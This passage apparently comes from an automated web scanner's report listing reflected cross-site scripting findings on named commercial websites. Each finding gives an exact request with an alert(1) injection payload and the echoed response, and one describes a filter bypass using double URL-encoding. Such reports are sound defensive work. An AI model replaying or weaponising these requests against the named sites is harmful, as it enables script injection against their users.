User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:24 GMT
Server: Apache
Set-Cookie: TLTSID=1C6DEEE2F58B10F503E18D01DCA54867; Path=/; Domain=.rogers.com
Set-Cookie: TLTUID=1C6DEEE2F58B10F503E18D01DCA54867; Path=/; Domain=.rogers.com; Expires=Thu, 13-10-2021 11:04:24 GMT
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 471
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=vWv9TWFYT232JZXysYFRtJhGtQG82kpB255nghJVYXR7MMv98cN9!-107432860; domain=.rogers.com; path=/
Set-Cookie: language=en; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:31 GMT; path=/
Set-Cookie: province=ON; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:31 GMT; path=/
Set-Cookie: customer_type=Residential; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:31 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


<script type="text/javascript">
<!--
   // check if cookie are enabled
   cookieBackup = document.cookie;
   document.cookie = "cookieCheck=yes";
   cookieOk = document.cookie.indexOf("cookieCheck=yes") > -1;
   document.cookie = cookieBackup;
   if (cookieOk) {
       window.location.href = "/web/content/SHM_Coming_Soonf6d53";4fb4a7d75e9";
   } else {    
       window.location.href = "/web/portlets/common/systemError/404.jsp";
   }
//-->
...[SNIP]...

1.13. https://www.rogers.com/web/content/SHM_Coming_Soon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.rogers.com
Path:   /web/content/SHM_Coming_Soon

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f63c1"-alert(1)-"40d7d326a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/content/SHM_Coming_Soon?f63c1"-alert(1)-"40d7d326a0=1 HTTP/1.1
Host: www.rogers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:55 GMT
Server: Apache
Set-Cookie: TLTSID=0B413638F58B10F503FAC4A0F78280C6; Path=/; Domain=.rogers.com
Set-Cookie: TLTUID=0B413638F58B10F503FAC4A0F78280C6; Path=/; Domain=.rogers.com; Expires=Thu, 13-10-2021 11:03:55 GMT
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 483
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2zdhTWFbxzK63yhVgnYqbc4Lf6RDs2YXTJC4QKnCB3tPLDTGBQKV!506780405; domain=.rogers.com; path=/
Set-Cookie: language=en; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:02 GMT; path=/
Set-Cookie: province=ON; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:02 GMT; path=/
Set-Cookie: customer_type=Residential; domain=.rogers.com; expires=Tuesday, 31-Oct-2079 14:18:02 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


<script type="text/javascript">
<!--
   // check if cookie are enabled
   cookieBackup = document.cookie;
   document.cookie = "cookieCheck=yes";
   cookieOk = document.cookie.indexOf("cookieCheck=yes") > -1;
   document.cookie = cookieBackup;
   if (cookieOk) {
       window.location.href = "/web/content/SHM_Coming_Soon?f63c1"-alert(1)-"40d7d326a0=1";
   } else {    
       window.location.href = "/web/portlets/common/systemError/404.jsp";
   }
//-->
...[SNIP]...

1.14. http://www.rpxcorp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rpxcorp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a11"><a>492cb211934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?83a11"><a>492cb211934=1 HTTP/1.1
Host: www.rpxcorp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 13 Oct 2011 11:03:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=12986745;path=/
Set-Cookie: CFTOKEN=12340961;path=/
Set-Cookie: DEBUG=0;path=/
Set-Cookie: USERID=;path=/
Set-Cookie: USERNAME=;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/index.cfm?83a11"><a>492cb211934=1&fontsize=1" class="on">
...[SNIP]...

1.15. http://www.segway.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.segway.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e1c"-alert(1)-"a4d5bfe43e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?41e1c"-alert(1)-"a4d5bfe43e2=1 HTTP/1.1
Host: www.segway.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: safety_popup_counter=1; expires=Sun, 07-Oct-2012 11:03:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 19921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<script type="text/javascript">a2a_linkname="Segway Home Page";a2a_linkurl="www.segway.com/?41e1c"-alert(1)-"a4d5bfe43e2=1";</script>
...[SNIP]...

1.16. http://www.silverspringnet.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverspringnet.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67e9"><script>alert(1)</script>16b9b2438e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php/d67e9"><script>alert(1)</script>16b9b2438e2 HTTP/1.1
Host: www.silverspringnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6068
Connection: close
Content-Type: text/html; charset=windows-1252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
This is the search template file (search_template.html) which contai
...[SNIP]...
<form method="get" action="/search.php/d67e9"><script>alert(1)</script>16b9b2438e2" class="zoom_searchform">
...[SNIP]...

1.17. http://www.spotmixer.com/create_video/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spotmixer.com
Path:   /create_video/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b616d"><script>alert(1)</script>5705d444d5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1 HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Cache-Control: no-cache
Set-Cookie: JSESSIONID=22F99E6D8A5AFAF6F7F431021E382FC3; Path=/create_video
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10403


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<form id="form_login" name="login_form" method="post" action="https://www.spotmixer.com/create_video/home?b616d"><script>alert(1)</script>5705d444d5a=1">
...[SNIP]...

1.18. http://www.spotmixer.com/create_video/register [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spotmixer.com
Path:   /create_video/register

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34282"><script>alert(1)</script>365ee9000a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /create_video/register?34282"><script>alert(1)</script>365ee9000a8=1 HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17375


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<form name="register_form" method="post" action="https://www.spotmixer.com/create_video/register?34282"><script>alert(1)</script>365ee9000a8=1">
...[SNIP]...

1.19. http://www.ss8.com/login-lost-password.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ss8.com
Path:   /login-lost-password.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa6e"><script>alert(1)</script>fee3537570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login-lost-password.php/3fa6e"><script>alert(1)</script>fee3537570 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:45 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta ht
...[SNIP]...
<form id="Login" action="/login-lost-password.php/3fa6e"><script>alert(1)</script>fee3537570" method="post">
...[SNIP]...

1.20. http://www.ss8.com/login.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ss8.com
Path:   /login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c376b"><script>alert(1)</script>4a485a12cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php/c376b"><script>alert(1)</script>4a485a12cae HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta ht
...[SNIP]...
<form id="Login" action="/login.php/c376b"><script>alert(1)</script>4a485a12cae" method="post">
...[SNIP]...

1.21. http://www.ss8.com/user-registration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ss8.com
Path:   /user-registration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 206fa"><script>alert(1)</script>547dfd0c1c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user-registration.php/206fa"><script>alert(1)</script>547dfd0c1c1 HTTP/1.1
Host: www.ss8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 5727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta h
...[SNIP]...
<form id="NewUser" action="/user-registration.php/206fa"><script>alert(1)</script>547dfd0c1c1" method="post">
...[SNIP]...

1.22. http://www.ventureloop.com/ventureloop/job_search.php [kword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ventureloop.com
Path:   /ventureloop/job_search.php

Issue detail

The value of the kword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973 was submitted in the kword parameter. This input was echoed as b652f"><script>alert(1)</script>6c17649a973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the kword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ventureloop/job_search.php?g=0&kword=gmz+energyb652f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c17649a973&jcat=%&jt=1&jc=1&jd=1&fb=1&srchid=0%7C1305743729&btn=1&pagid=0 HTTP/1.1
Host: www.ventureloop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=1tmnpvt7n7ef8knna1rv1nhjr4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
<input class="tdInput"    maxlength="" name="keywords"
   type="text"    maxlength="" value="gmz energyb652f"><script>alert(1)</script>6c17649a973"
   id="keywords" />
...[SNIP]...

1.23. http://www.veracyte.com/base/login.phpx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veracyte.com
Path:   /base/login.phpx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa254<script>alert(1)</script>c1576a2b5bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /basefa254<script>alert(1)</script>c1576a2b5bf/login.phpx HTTP/1.1
Host: www.veracyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:31 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 92

Bad file./home/veracyte/public_html/basefa254<script>alert(1)</script>c1576a2b5bf/login.phpx

1.24. http://www.veracyte.com/base/login.phpx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veracyte.com
Path:   /base/login.phpx

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b11b2<script>alert(1)</script>c77da55e264 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /base/login.phpxb11b2<script>alert(1)</script>c77da55e264 HTTP/1.1
Host: www.veracyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:03:33 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 92

Bad file./home/veracyte/public_html/base/login.phpxb11b2<script>alert(1)</script>c77da55e264

1.25. http://www.whatstyle.net/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whatstyle.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee403"><script>alert(1)</script>fad55204c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee403"><script>alert(1)</script>fad55204c76=1 HTTP/1.1
Host: www.whatstyle.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 10:57:31 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.7a DAV/2 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5896d54900e083837aafc0e3c1a5115c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>Home | whatstyle.net</title>
       <meta http-equiv="Content-Type" content="tex
...[SNIP]...
<a lang="nl" hreflang="nl" href="http://www.whatstyle.net/nl.index.php?ee403"><script>alert(1)</script>fad55204c76=1" title="Bekijk deze pagina in het Nederlands">
...[SNIP]...

1.26. http://x3show.mevio.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://x3show.mevio.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59636</script><script>alert(1)</script>210e0a57c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?59636</script><script>alert(1)</script>210e0a57c69=1 HTTP/1.1
Host: x3show.mevio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-PDN-Server: 127_1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 478092
X-Cacheable: YES
Date: Thu, 13 Oct 2011 11:01:58 GMT
X-Varnish: 1693948109
Age: 0
Via: 1.1 varnish
Connection: close
Set-Cookie: MevioLBCookie=AKEIABAK; Expires=Thu, 13-Oct-2011 19:01:57 GMT; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:meebo="http://www.meebo.com">
<head>

   
<scri
...[SNIP]...
<script>
setTimeout ( function () {
COMSCORE.beacon({
   c1:2,
   c2:"5000004",
   c3:"",
   c4:"x3show.mevio.com/?59636</script><script>alert(1)</script>210e0a57c69=1",
   c5:"",
   c6:"",
   c15:""
   });
io.mev.crux.queue( 'verified' );
}, 0 );
</script>
...[SNIP]...

1.27. http://www.sportsauthority.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sportsauthority.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39032"><script>alert(1)</script>405e9d78bc0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.sportsauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=39032"><script>alert(1)</script>405e9d78bc0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 13 Oct 2011 11:04:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=PyhWTWFHJML0k2Tp9pLd2lVJG2lphzVnYk2QntHCCQJ7Q110221T!-617247002; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: browser_id=133517112954; expires=Sunday, 10-Oct-2021 11:04:39 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 132143


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->



...[SNIP]...
<iframe SRC="http://fls.doubleclick.net/activityi;src=1718856;type=homep006;cat=homep126;u1=null;u2=1;u3=null;u4=null;u5=http://www.google.com/search?hl=en&q=39032"><script>alert(1)</script>405e9d78bc0;ord=1;num=45875512?" width="0" height="0" frameborder="0">
...[SNIP]...

1.28. http://www.spotmixer.com/create_video/customer_service [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.spotmixer.com
Path:   /create_video/customer_service

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117fe"><script>alert(1)</script>c0d2c0471b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /create_video/customer_service HTTP/1.1
Host: www.spotmixer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5

Response

HTTP/1.1 200 OK
Date: Thu, 13 Oct 2011 11:04:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7m mod_jk/1.2.26
Set-Cookie: JSESSIONID=A32D46864152B68684F5C20FB4B7E30D; Path=/create_video
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15802


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...
<input type="hidden" name="return_url" value="http://www.google.com/search?hl=en&q=117fe"><script>alert(1)</script>c0d2c0471b5" />
...[SNIP]...

1.29. http://www.toysrus.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd36c"><script>alert(1)</script>2d1a52ce099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

